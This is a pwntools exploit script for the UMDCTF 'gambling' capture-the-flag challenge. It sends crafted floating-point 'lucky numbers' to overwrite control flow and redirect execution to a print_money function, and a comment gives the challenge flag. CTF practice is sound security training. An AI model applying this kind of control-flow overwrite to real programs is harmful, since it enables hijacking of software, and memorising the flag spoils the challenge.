#!/usr/bin/env python3
from pwn import *
import struct
elf = ELF("./gambling_patched")
context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
b *gamble + 81
continue
'''
def start():
if args.REMOTE:
return remote("challs.umdctf.io", 31005)
if args.GDB:
return gdb.debug([elf.path], gdbscript=gs)
else:
return process([elf.path])
r = start()
def rcu(d1, d2=0):
r.recvuntil(d1, drop=True)
if (d2):
return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value
def int_to_double(x: int) -> float:
# Pack the integer as 8 bytes (little-endian)
packed = struct.pack('<Q', x)
# Unpack those bytes as a double (little-endian)
double_value = struct.unpack('<d', packed)[0]
return double_value
#========= exploit here ===================
a = int_to_double(0x1111111111111111)
b = int_to_double(0x2222222222222222)
c = int_to_double(0x3333333333333333)
d = int_to_double(0x4444444444444444)
e = int_to_double(0x5555555555555555)
f = int_to_double(0x6666666666666666)
g = int_to_double(0x080492c0080492c0)
#0x080492c0 print_money()
sla(b"ucky numbers:", bc(a))
sleep(0.1)
sl(bc(b))
sleep(0.1)
sl(bc(c))
sleep(0.1)
sl(bc(d))
sleep(0.1)
sl(bc(e))
sleep(0.1)
sl(bc(f))
sleep(0.1)
sl(bc(g))
#UMDCTF{99_percent_of_pwners_quit_before_they_get_a_shell_congrats_on_being_the_1_percent}
#========= interactive ====================
r.interactive()